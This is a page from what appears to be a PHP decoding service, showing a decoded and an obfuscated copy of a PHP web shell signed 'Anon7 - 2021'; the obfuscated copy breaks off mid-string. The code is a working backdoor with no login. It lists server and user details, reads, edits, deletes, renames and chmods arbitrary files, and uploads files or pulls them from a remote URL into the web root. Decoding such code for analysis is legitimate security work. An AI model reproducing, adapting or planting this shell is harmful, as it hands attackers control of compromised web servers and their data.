Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto OZv5P; a6bi2: function statusnya($file) { $statusnya = fileperms($file); if (($sta..

Decoded Output download

<?   
 goto OZv5P; a6bi2: function statusnya($file) { $statusnya = fileperms($file); if (($statusnya & 49152) == 49152) { $ingfo = "s"; } elseif (($statusnya & 40960) == 40960) { $ingfo = "l"; } elseif (($statusnya & 32768) == 32768) { $ingfo = "-"; } elseif (($statusnya & 24576) == 24576) { $ingfo = "b"; } elseif (($statusnya & 16384) == 16384) { $ingfo = "d"; } elseif (($statusnya & 8192) == 8192) { $ingfo = "c"; } elseif (($statusnya & 4096) == 4096) { $ingfo = "p"; } else { $ingfo = "u"; } $ingfo .= $statusnya & 256 ? "r" : "-"; $ingfo .= $statusnya & 128 ? "w" : "-"; $ingfo .= $statusnya & 64 ? $statusnya & 2048 ? "s" : "x" : ($statusnya & 2048 ? "S" : "-"); $ingfo .= $statusnya & 32 ? "r" : "-"; $ingfo .= $statusnya & 16 ? "w" : "-"; $ingfo .= $statusnya & 8 ? $statusnya & 1024 ? "s" : "x" : ($statusnya & 1024 ? "S" : "-"); $ingfo .= $statusnya & 4 ? "r" : "-"; $ingfo .= $statusnya & 2 ? "w" : "-"; $ingfo .= $statusnya & 1 ? $statusnya & 512 ? "t" : "x" : ($statusnya & 512 ? "T" : "-"); return $ingfo; } goto LLZHQ; Xbd3k: $lokasi = str_replace("\", "/", $lokasi); goto igPlY; IcnwN: echo "Upload File : "; goto XzEJI; igPlY: $lokasis = explode("/", $lokasi); goto Zr_w1; sHX4R: foreach ($lokasinya as $dir) { if (!is_dir($lokasi . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "<tr>
\x9<td><a href="?path=" . $lokasi . "/" . $dir . "">" . $dir . "</a></td>
	<td><center>--</center></td>
\x9<td><center>"; if (is_writable($lokasi . "/" . $dir)) { echo "<font color="green">"; } elseif (!is_readable($lokasi . "/" . $dir)) { echo "<font color="red">"; } echo statusnya($lokasi . "/" . $dir); if (is_writable($lokasi . "/" . $dir) || !is_readable($lokasi . "/" . $dir)) { echo "</font>"; } echo "</center></td>\xa\x9<td><center><form method="POST" action="?pilihan&path={$lokasi}">\xa\x9<select name="pilih">\xa	<option value=""></option>
	<option value="hapus">Delete</option>
	<option value="ubahmod">Chm0d</option>
	<option value="gantinama">Rename</option>
	</select>\xa	<input type="hidden" name="type" value="dir">\xa\x9<input type="hidden" name="name" value="{$dir}">\xa\x9<input type="hidden" name="path" value="{$lokasi}/{$dir}">
\x9<input type="submit" class="gas" value=">" />
	</form></center></td>\xa\x9</tr>"; } goto uyexF; HIAMg: set_time_limit(0); goto XHLYL; r1Vd2: echo "</table><br>"; goto RsuZe; XHLYL: error_reporting(0); goto S3KF0; XzEJI: echo "<form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ " . cekdir() . " ]\xa<input type="radio" value="2" name="dirnya" >document_root [ " . cekroot() . " ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://anon7.xyz/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="3" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form>"; goto r1Vd2; elemu: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "<a href="?path=/">/</a>"; continue; } if ($lok == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $lok . "</a>/"; } goto gScDm; RsuZe: if (isset($_GET["fileloc"])) { echo "<tr><td>Current File : " . $_GET["fileloc"]; echo "</tr></td></table><br/>"; echo "<pre>" . htmlspecialchars(file_get_contents($_GET["fileloc"])) . "</pre>"; author(); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "hapus") { if (is_dir($_POST["path"])) { xrmdir($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); echo "string"; } } elseif (is_file($_POST["path"])) { @unlink($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to Delete File !"); } else { green("Delete File Success !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahmod") { echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">\xa\x9Permission : <input name="perm" type="text" class="up" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />\xa	<input type="hidden" name="path" value="" . $_POST["path"] . "">
	<input type="hidden" name="pilih" value="ubahmod">
	<input type="submit" value="Change" name="chm0d" class="up" style="cursor: pointer; border-color: #fff"/>\xa\x9</form>"; if (isset($_POST["chm0d"])) { $cm = @chmod($_POST["path"], $_POST["perm"]); if ($cm == true) { green("Change Mod Success !"); } else { red("Change Mod Failed !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "gantinama") { if (isset($_POST["gantin"])) { $ren = @rename($_POST["path"], $_POST["newname"]); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST["name"])) { $namaawal = $_POST["newname"]; } else { $namawal = $_POST["name"]; } echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
	New Name : <input name="newname" type="text" class="up" size="20" value="" . $namaawal . "" />
	<input type="hidden" name="path" value="" . $_POST["path"] . "">
\x9<input type="hidden" name="pilih" value="gantinama">\xa\x9<input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #fff"/>\xa\x9</form>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "edit") { if (isset($_POST["gasedit"])) { $edit = @file_put_contents($_POST["path"], $_POST["src"]); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "<center>" . $_POST["path"] . "<br><br>"; echo "<form method="post">\xa\x9<textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br>
\x9<input type="hidden" name="path" value="" . $_POST["path"] . "">\xa\x9<input type="hidden" name="pilih" value="edit">
\x9<input type="submit" value="Edit File" name="gasedit" />
\x9</form><br>"; } goto N94bO; Wh8L6: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}/{$file}")) { continue; } $size = filesize("{$lokasi}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>\xa<td><a href="?fileloc={$lokasi}/{$file}&path={$lokasi}">{$file}</a></td>\xa<td><center>" . $size . "</center></td>
<td><center>"; if (is_writable("{$lokasi}/{$file}")) { echo "<font color="green">"; } elseif (!is_readable("{$lokasi}/{$file}")) { echo "<font color="red">"; } echo statusnya("{$lokasi}/{$file}"); if (is_writable("{$lokasi}/{$file}") || !is_readable("{$lokasi}/{$file}")) { echo "</font>"; } echo "</center></td><td><center>\xa<form method="post" action="?pilihan&path={$lokasi}">\xa<select name="pilih">\xa<option value=""></option>\xa<option value="hapus">Delete</option>
<option value="ubahmod">Chm0d</option>\xa<option value="gantinama">Rename</option>\xa<option value="edit">Edit</option>\xa</select>\xa<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="{$file}">
<input type="hidden" name="path" value="{$lokasi}/{$file}">
<input type="submit" class="gas" value=">" />\xa</form></center></td>\xa</tr>"; } goto cb8rQ; S3KF0: $disfunc = @ini_get("disable_functions"); goto WSxDh; FZxw8: function cekdir() { if (isset($_GET["path"])) { $lokasi = $_GET["path"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto Dt4vE; zXKIr: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto k_Kg8; IE3kQ: echo "User : <font color='gold'>" . @get_current_user() . "&nbsp;</font>( <font color='gold'>" . @getmyuid() . "</font>)<br>"; goto oqfta; PjQtC: echo "System : <font color='gold'>" . php_uname() . "</font><br>"; goto IE3kQ; OZv5P: ?> 
<!doctypehtml><html><head><title>.</title></head><body bgcolor="#1f1f1f"text="#ffffff"><link href=""rel="stylesheet"type="text/css"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);body{font-family:Dosis,cursive;text-shadow:0 0 1px #757575}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#25383c}#content .first:hover{background-color:#25383c text-shadow:0px 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#fff;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee"size="5">KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY</font></center><table align="center"border="0"cellpadding="3"cellspacing="1"width="700"><tr><td><?php  goto HIAMg; Dt4vE: function cekroot() { if (is_writable($_SERVER["DOCUMENT_ROOT"])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto W5VOk; KZyJ5: echo "Disable Function : " . $disf . "</font><br>"; goto xfypo; cb8rQ: echo "</tr></td></table></table>"; goto HIzBX; N94bO: echo "<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">\xa<td><center>Name</center></td>
<td><center>Size</center></td>\xa<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>"; goto sHX4R; W5VOk: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . "/" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto NGC_f; NGC_f: function green($text) { echo "<center><font color='green'>" . $text . "</center></font>"; } goto XGC1J; LNMA0: function author() { echo "<center><br>Anon7 - 2021</center>"; die; } goto FZxw8; iUm5J: if (isset($_POST["upwkwk"])) { if (isset($_POST["berkasnya"])) { if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_FILES["berkas"]["name"], @file_get_contents($_FILES["berkas"]["tmp_name"])); if (file_exists($lokasi . "/" . $_FILES["berkas"]["name"])) { echo "File Uploaded ! &nbsp;<font color='gold'><i>" . $lokasi . "/" . $_FILES["berkas"]["name"] . "</i></font><br><br>"; } else { echo "<font color='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["linknya"])) { if (empty($_POST["namalink"])) { die("Filename cannot be empty !"); } if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_POST["namalink"], @file_get_contents($_POST["darilink"])); if (file_exists($lokasi . "/" . $_POST["namalink"])) { echo "File Uploaded ! &nbsp;<font color='gold'><i>" . $lokasi . "/" . $_POST["namalink"] . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } } goto IcnwN; HIzBX: author(); goto a6bi2; k_Kg8: if (isset($_GET["path"])) { $lokasi = $_GET["path"]; $lokdua = $_GET["path"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto Xbd3k; Zr_w1: $lokasinya = @scandir($lokasi); goto elemu; gScDm: echo "</td></tr><tr><td><br>"; goto iUm5J; WSxDh: if (empty($disfunc)) { $disf = "<font color='gold'>NONE</font>"; } else { $disf = "<font color='red'>" . $disfunc . "</font>"; } goto LNMA0; oqfta: echo "PHP Version : <font color='gold'>" . @phpversion() . "</font><br>"; goto KZyJ5; XGC1J: function red($text) { echo "<center><font color='red'>" . $text . "</center></font>"; } goto t3A6Q; uyexF: echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; goto Wh8L6; xfypo: echo "Directory : &nbsp;"; goto zXKIr; t3A6Q: echo "Server : <font color='gold'>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; goto PjQtC; LLZHQ:  ?>

Did this file decode correctly?

Original Code


 goto OZv5P; a6bi2: function statusnya($file) { $statusnya = fileperms($file); if (($statusnya & 49152) == 49152) { $ingfo = "\163"; } elseif (($statusnya & 40960) == 40960) { $ingfo = "\154"; } elseif (($statusnya & 32768) == 32768) { $ingfo = "\x2d"; } elseif (($statusnya & 24576) == 24576) { $ingfo = "\142"; } elseif (($statusnya & 16384) == 16384) { $ingfo = "\x64"; } elseif (($statusnya & 8192) == 8192) { $ingfo = "\143"; } elseif (($statusnya & 4096) == 4096) { $ingfo = "\160"; } else { $ingfo = "\165"; } $ingfo .= $statusnya & 256 ? "\162" : "\x2d"; $ingfo .= $statusnya & 128 ? "\167" : "\x2d"; $ingfo .= $statusnya & 64 ? $statusnya & 2048 ? "\x73" : "\x78" : ($statusnya & 2048 ? "\123" : "\x2d"); $ingfo .= $statusnya & 32 ? "\162" : "\x2d"; $ingfo .= $statusnya & 16 ? "\167" : "\x2d"; $ingfo .= $statusnya & 8 ? $statusnya & 1024 ? "\163" : "\x78" : ($statusnya & 1024 ? "\123" : "\55"); $ingfo .= $statusnya & 4 ? "\x72" : "\x2d"; $ingfo .= $statusnya & 2 ? "\x77" : "\x2d"; $ingfo .= $statusnya & 1 ? $statusnya & 512 ? "\164" : "\170" : ($statusnya & 512 ? "\x54" : "\55"); return $ingfo; } goto LLZHQ; Xbd3k: $lokasi = str_replace("\x5c", "\57", $lokasi); goto igPlY; IcnwN: echo "\x55\x70\x6c\157\x61\x64\x20\x46\151\154\x65\x20\x3a\x20"; goto XzEJI; igPlY: $lokasis = explode("\x2f", $lokasi); goto Zr_w1; sHX4R: foreach ($lokasinya as $dir) { if (!is_dir($lokasi . "\x2f" . $dir) || $dir == "\x2e" || $dir == "\56\56") { continue; } echo "\74\164\x72\x3e\12\x9\x3c\164\144\76\x3c\141\x20\x68\162\145\x66\x3d\42\77\160\x61\x74\x68\75" . $lokasi . "\x2f" . $dir . "\x22\x3e" . $dir . "\74\x2f\141\x3e\74\x2f\164\x64\x3e\12\11\x3c\x74\144\76\74\x63\x65\x6e\x74\145\x72\76\55\55\74\x2f\143\x65\x6e\164\145\162\76\x3c\x2f\x74\x64\x3e\12\x9\74\x74\144\76\x3c\x63\145\x6e\164\145\162\x3e"; if (is_writable($lokasi . "\x2f" . $dir)) { echo "\74\146\157\x6e\164\40\x63\x6f\154\157\162\75\42\x67\x72\x65\x65\x6e\42\76"; } elseif (!is_readable($lokasi . "\57" . $dir)) { echo "\x3c\x66\157\156\164\x20\x63\x6f\154\157\162\x3d\42\x72\145\x64\42\76"; } echo statusnya($lokasi . "\57" . $dir); if (is_writable($lokasi . "\x2f" . $dir) || !is_readable($lokasi . "\x2f" . $dir)) { echo "\74\x2f\x66\157\x6e\164\76"; } echo "\74\57\143\x65\156\164\x65\162\x3e\x3c\x2f\x74\x64\x3e\xa\x9\x3c\x74\x64\x3e\74\143\x65\x6e\164\145\x72\76\x3c\146\x6f\x72\155\40\x6d\x65\x74\x68\x6f\x64\75\42\120\117\123\124\x22\40\141\143\164\151\157\x6e\75\42\x3f\x70\x69\154\x69\150\141\156\x26\160\x61\x74\x68\x3d{$lokasi}\42\76\xa\x9\74\x73\145\154\x65\x63\164\40\x6e\x61\155\x65\75\x22\160\151\x6c\x69\x68\42\x3e\xa\11\x3c\x6f\x70\x74\151\x6f\x6e\40\x76\141\154\165\145\x3d\x22\x22\x3e\x3c\x2f\157\160\164\x69\157\x6e\x3e\12\11\x3c\x6f\x70\x74\151\157\156\x20\x76\x61\154\x75\x65\x3d\x22\x68\x61\160\165\163\42\x3e\x44\145\154\x65\164\x65\74\x2f\157\160\164\x69\157\x6e\x3e\12\11\74\x6f\160\x74\x69\x6f\x6e\40\x76\x61\x6c\x75\x65\x3d\x22\x75\x62\x61\150\x6d\157\x64\x22\x3e\x43\150\155\x30\144\74\57\157\160\164\151\x6f\156\76\12\11\74\157\x70\164\x69\x6f\x6e\x20\x76\x61\x6c\x75\145\x3d\x22\147\141\156\164\x69\156\x61\x6d\141\42\76\122\145\x6e\x61\155\x65\x3c\x2f\157\x70\x74\x69\x6f\x6e\x3e\12\11\74\57\163\145\x6c\x65\143\x74\76\xa\11\74\151\156\160\165\x74\40\x74\171\160\x65\x3d\x22\150\x69\144\144\x65\156\x22\40\x6e\141\x6d\x65\75\42\x74\171\160\145\x22\40\x76\x61\x6c\x75\145\x3d\42\144\x69\162\42\x3e\xa\x9\74\151\156\x70\x75\x74\40\x74\x79\160\145\x3d\x22\x68\151\x64\144\x65\x6e\x22\40\x6e\x61\x6d\145\75\42\x6e\x61\155\145\42\40\166\141\x6c\x75\145\x3d\42{$dir}\42\x3e\xa\x9\x3c\x69\156\160\165\x74\40\164\x79\160\x65\x3d\42\150\151\x64\x64\145\156\x22\40\x6e\x61\x6d\x65\75\42\160\x61\164\x68\42\40\x76\x61\x6c\x75\x65\75\x22{$lokasi}\x2f{$dir}\x22\76\12\x9\x3c\x69\x6e\x70\165\164\x20\164\x79\x70\145\75\x22\163\165\x62\155\x69\164\x22\x20\x63\x6c\141\x73\163\x3d\42\x67\141\163\x22\40\166\141\x6c\x75\x65\x3d\42\76\42\40\x2f\76\12\11\74\x2f\146\157\x72\155\x3e\74\x2f\143\145\156\164\145\162\x3e\74\x2f\164\x64\76\xa\x9\x3c\x2f\x74\162\76"; } goto uyexF; HIAMg: set_time_limit(0); goto XHLYL; r1Vd2: echo "\x3c\57\164\141\142\x6c\145\x3e\x3c\142\162\76"; goto RsuZe; XHLYL: error_reporting(0); goto S3KF0; XzEJI: echo "\x3c\x66\x6f\x72\155\40\145\x6e\x63\x74\x79\x70\x65\x3d\42\x6d\165\x6c\x74\x69\160\141\162\164\57\x66\157\x72\x6d\x2d\x64\141\164\x61\42\40\x6d\145\164\150\157\144\75\42\x70\x6f\x73\164\42\x3e\12\x3c\151\x6e\160\165\164\40\164\171\x70\145\x3d\x22\162\141\x64\x69\x6f\42\x20\x76\141\154\165\145\x3d\42\61\x22\40\156\x61\155\x65\75\42\144\151\162\x6e\x79\x61\x22\40\143\x68\145\143\x6b\x65\144\76\143\x75\162\162\145\156\x74\x5f\144\x69\x72\x20\x5b\x20" . cekdir() . "\x20\x5d\xa\74\151\x6e\160\165\x74\x20\164\171\x70\145\75\42\x72\x61\x64\151\157\42\x20\x76\141\154\x75\x65\x3d\x22\62\x22\40\156\x61\x6d\145\x3d\x22\x64\151\162\156\x79\x61\x22\40\76\x64\157\143\165\x6d\x65\156\164\137\x72\157\157\x74\40\x5b\40" . cekroot() . "\x20\135\12\74\x62\x72\x3e\12\x3c\x69\156\x70\x75\164\40\x74\171\160\x65\x3d\42\x68\x69\x64\144\x65\156\42\40\156\x61\155\145\x3d\x22\165\160\167\x6b\167\153\42\40\166\x61\x6c\x75\145\75\x22\141\x70\x6c\x6f\x64\42\76\12\x3c\x69\156\160\165\x74\40\x74\x79\x70\x65\x3d\42\x66\x69\x6c\x65\42\x20\x6e\141\155\x65\x3d\x22\142\145\x72\153\x61\163\42\76\x3c\x69\x6e\160\165\164\40\164\171\160\145\x3d\x22\x73\x75\x62\x6d\x69\x74\x22\40\156\x61\155\145\x3d\x22\x62\x65\x72\153\141\x73\156\x79\x61\x22\40\166\x61\x6c\165\x65\x3d\x22\125\160\154\157\141\144\42\40\x63\154\x61\x73\163\x3d\x22\165\160\42\x20\x73\164\171\154\x65\75\x22\143\165\x72\x73\157\162\x3a\40\x70\x6f\x69\x6e\164\x65\162\x3b\40\x62\157\162\144\145\x72\x2d\143\x6f\x6c\157\x72\x3a\x20\x23\x66\146\x66\x22\x3e\x3c\x62\162\76\12\x3c\151\156\x70\x75\164\x20\x74\171\x70\145\x3d\x22\164\x65\170\x74\x22\x20\x6e\141\x6d\145\x3d\x22\x64\x61\162\x69\x6c\151\156\153\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\165\x70\42\x20\160\154\x61\143\145\150\157\x6c\x64\x65\162\x3d\42\x68\x74\x74\160\163\72\57\57\x61\x6e\x6f\x6e\x37\x2e\x78\x79\x7a\57\165\x70\x6c\x6f\141\144\x2e\x74\170\x74\42\76\x26\156\x62\x73\160\73\x3c\x69\156\160\x75\164\x20\x74\171\x70\x65\x3d\x22\x74\145\170\x74\x22\x20\156\141\x6d\145\75\x22\x6e\141\x6d\x61\154\151\x6e\x6b\42\x20\x63\154\141\163\163\x3d\42\x75\x70\x22\x20\163\x69\172\145\x3d\42\x33\42\40\160\x6c\141\x63\145\150\157\x6c\x64\145\162\75\42\x66\151\x6c\x65\x2e\x74\x78\164\42\x3e\74\x69\156\160\165\164\40\x74\x79\x70\x65\x3d\42\163\165\142\x6d\151\164\42\x20\156\141\x6d\x65\x3d\x22\x6c\151\x6e\153\156\x79\141\42\40\x63\154\x61\x73\x73\75\x22\x75\x70\42\40\166\x61\154\165\x65\x3d\x22\125\160\154\x6f\141\144\x22\40\163\x74\x79\x6c\145\75\x22\x63\165\x72\x73\157\162\x3a\x20\x70\157\x69\156\164\x65\162\x3b\40\x62\157\x72\144\x65\x72\x2d\143\x6f\154\157\x72\72\40\x23\146\x66\x66\x22\x3e\12\74\x2f\x66\157\x72\x6d\76"; goto r1Vd2; elemu: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "\x3c\x61\x20\x68\x72\145\x66\75\x22\77\160\141\164\x68\75\57\42\x3e\57\74\x2f\x61\76"; continue; } if ($lok == '') { continue; } echo "\74\x61\40\150\x72\x65\146\75\x22\77\x70\x61\x74\x68\x3d"; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "\x2f"; } } echo "\42\76" . $lok . "\x3c\57\141\x3e\x2f"; } goto gScDm; RsuZe: if (isset($_GET["\146\151\154\145\x6c\157\x63"])) { echo "\74\x74\162\76\x3c\x74\x64\x3e\x43\x75\x72\x72\x65\156\164\x20\x46\x69\x6c\x65\40\72\x20" . $_GET["\x66\x69\154\x65\154\157\x63"]; echo "\x3c\57\x74\162\x3e\x3c\57\x74\144\76\74\57\164\141\x62\x6c\x65\x3e\74\142\162\x2f\x3e"; echo "\x3c\160\162\x65\x3e" . htmlspecialchars(file_get_contents($_GET["\x66\x69\x6c\145\x6c\x6f\143"])) . "\x3c\x2f\160\x72\145\76"; author(); } elseif (isset($_GET["\x70\x69\154\x69\150\x61\156"]) && $_POST["\x70\x69\154\x69\150"] == "\150\x61\160\x75\x73") { if (is_dir($_POST["\x70\141\x74\150"])) { xrmdir($_POST["\x70\x61\164\150"]); if (file_exists($_POST["\160\x61\164\150"])) { red("\106\x61\x69\x6c\145\144\x20\x74\x6f\40\x64\x65\154\145\164\145\x20\104\x69\162\145\143\164\x6f\x72\171\x20\41"); } else { green("\x44\145\x6c\x65\x74\x65\x20\x44\x69\x72\x65\x63\x74\x6f\162\x79\x20\123\165\143\143\x65\163\x73\40\x21"); echo "\x73\x74\162\x69\156\147"; } } elseif (is_file($_POST["\x70\x61\164\150"])) { @unlink($_POST["\x70\141\164\150"]); if (file_exists($_POST["\x70\x61\x74\x68"])) { red("\x46\141\x69\x6c\x65\144\x20\164\157\40\104\145\154\x65\164\145\x20\106\x69\154\x65\x20\x21"); } else { green("\104\145\154\x65\164\x65\40\x46\151\154\x65\x20\x53\165\143\x63\x65\163\x73\40\41"); } } } elseif (isset($_GET["\x70\151\154\151\x68\141\156"]) && $_POST["\x70\151\154\151\x68"] == "\165\142\141\150\x6d\x6f\144") { echo "\x3c\143\x65\x6e\164\145\162\x3e" . $_POST["\x70\x61\x74\x68"] . "\x3c\x62\162\76"; echo "\x3c\x66\157\x72\155\40\x6d\x65\x74\150\x6f\144\75\42\x70\x6f\163\x74\x22\x3e\xa\x9\x50\x65\x72\155\151\x73\163\x69\157\x6e\x20\x3a\40\x3c\151\156\160\165\x74\x20\x6e\141\155\145\x3d\x22\x70\x65\162\x6d\x22\x20\x74\x79\160\x65\x3d\x22\164\145\170\164\42\x20\x63\154\141\x73\163\75\x22\165\x70\x22\x20\163\151\x7a\145\x3d\42\x34\42\x20\x76\x61\154\165\x65\x3d\42" . substr(sprintf("\45\157", fileperms($_POST["\x70\141\164\150"])), -4) . "\42\x20\57\x3e\xa\11\x3c\x69\156\x70\x75\164\40\x74\x79\x70\145\x3d\x22\x68\151\x64\144\x65\x6e\42\40\x6e\x61\x6d\145\x3d\42\160\x61\164\150\x22\x20\x76\x61\154\165\145\x3d\x22" . $_POST["\160\x61\164\150"] . "\x22\76\12\11\74\x69\156\160\x75\x74\40\164\171\160\145\x3d\42\x68\x69\x64\x64\x65\x6e\x22\x20\x6e\141\x6d\x65\75\x22\x70\151\x6c\x69\150\42\x20\166\x61\154\165\x65\x3d\x22\x75\142\x61\x68\x6d\157\144\42\x3e\12\11\x3c\151\156\x70\165\164\x20\x74\171\160\145\75\42\163\x75\142\155\x69\164\42\40\166\x61\x6c\165\145\75\42\103\150\141\156\x67\x65\x22\40\x6e\141\x6d\x65\x3d\x22\x63\x68\x6d\60\x64\42\x20\x63\154\x61\163\163\x3d\42\165\160\42\x20\163\164\171\x6c\x65\x3d\42\x63\165\x72\163\x6f\x72\x3a\40\x70\157\x69\156\x74\x65\x72\x3b\x20\142\x6f\x72\144\x65\162\55\x63\x6f\x6c\157\162\x3a\x20\43\146\146\x66\42\x2f\76\xa\x9\x3c\x2f\146\157\162\x6d\76"; if (isset($_POST["\143\150\155\60\144"])) { $cm = @chmod($_POST["\160\141\164\150"], $_POST["\160\x65\x72\x6d"]); if ($cm == true) { green("\103\150\141\x6e\147\145\x20\x4d\x6f\x64\40\x53\x75\x63\143\145\x73\x73\x20\41"); } else { red("\103\150\141\156\147\145\40\115\157\x64\40\x46\x61\151\154\145\x64\x20\41"); } } } elseif (isset($_GET["\160\151\154\x69\150\141\156"]) && $_POST["\x70\151\x6c\x69\150"] == "\147\x61\156\x74\x69\156\141\155\x61") { if (isset($_POST["\x67\141\156\x74\x69\x6e"])) { $ren = @rename($_POST["\160\x61\x74\x68"], $_POST["\x6e\x65\167\156\141\155\145"]); if ($ren == true) { green("\x43\150\x61\x6e\x67\145\x20\x4e\x61\x6d\x65\x20\x53\x75\143\143\145\163\163\40\x21"); } else { red("\103\x68\141\x6e\x67\145\x20\x4e\x61\155\x65\x20\x46\141\x69\154\x65\144\40\x21"); } } if (empty($_POST["\x6e\141\155\x65"])) { $namaawal = $_POST["\x6e\145\x77\x6e\x61\155\145"]; } else { $namawal = $_POST["\x6e\x61\x6d\x65"]; } echo "\x3c\x63\145\156\x74\145\162\76" . $_POST["\160\141\164\x68"] . "\x3c\x62\x72\76"; echo "\74\146\157\162\155\x20\x6d\x65\164\150\157\144\x3d\x22\x70\157\x73\x74\x22\76\12\11\116\145\x77\40\x4e\x61\155\145\x20\72\40\74\x69\156\x70\x75\x74\40\156\x61\x6d\x65\75\42\156\x65\167\x6e\x61\x6d\145\x22\x20\x74\x79\160\x65\75\x22\164\145\x78\x74\42\40\x63\154\141\163\x73\75\x22\x75\x70\x22\40\x73\x69\172\x65\x3d\x22\62\x30\42\40\x76\x61\x6c\165\x65\75\x22" . $namaawal . "\x22\40\x2f\76\12\11\x3c\x69\x6e\160\165\164\x20\x74\x79\160\x65\x3d\x22\x68\151\144\144\145\156\x22\x20\156\141\155\x65\75\42\160\141\x74\x68\x22\x20\166\x61\x6c\x75\x65\x3d\42" . $_POST["\160\141\164\x68"] . "\42\76\12\x9\x3c\151\156\x70\165\164\x20\x74\x79\160\x65\x3d\x22\x68\151\144\x64\145\x6e\42\x20\156\x61\x6d\x65\x3d\x22\160\x69\154\x69\150\42\40\166\x61\154\165\x65\75\42\x67\141\156\x74\x69\x6e\141\155\x61\x22\76\xa\x9\74\x69\x6e\x70\165\x74\x20\164\x79\x70\145\x3d\x22\163\165\x62\155\151\164\x22\x20\166\x61\154\x75\145\x3d\42\103\150\141\156\147\x65\42\x20\156\x61\155\145\x3d\42\x67\x61\x6e\164\x69\x6e\42\40\x63\x6c\x61\x73\163\75\42\x75\160\x22\x20\x73\164\x79\x6c\145\x3d\42\143\x75\162\163\x6f\162\72\40\x70\x6f\x69\156\x74\x65\x72\73\x20\142\157\162\144\x65\x72\x2d\143\x6f\154\x6f\162\72\40\x23\x66\x66\146\42\57\76\xa\x9\x3c\x2f\x66\157\162\x6d\76"; } elseif (isset($_GET["\160\x69\154\x69\x68\141\156"]) && $_POST["\x70\151\x6c\151\150"] == "\145\x64\x69\164") { if (isset($_POST["\147\x61\x73\145\x64\151\x74"])) { $edit = @file_put_contents($_POST["\x70\141\164\x68"], $_POST["\x73\162\143"]); if ($edit == true) { green("\105\144\x69\x74\40\x46\151\154\145\x20\123\x75\143\x63\x65\163\x73\40\x21"); } else { red("\105\x64\x69\x74\x20\x46\x69\154\145\40\106\x61\x69\x6c\x65\144\x20\41"); } } echo "\x3c\x63\x65\156\164\x65\x72\x3e" . $_POST["\x70\x61\164\x68"] . "\x3c\142\162\x3e\74\142\x72\x3e"; echo "\74\146\x6f\162\155\40\x6d\145\164\150\x6f\x64\75\42\160\157\163\164\42\76\xa\x9\74\164\145\170\164\141\x72\145\x61\40\143\x6f\x6c\x73\x3d\70\x30\40\162\157\167\x73\x3d\62\60\x20\x6e\141\x6d\145\75\42\x73\x72\x63\42\x3e" . 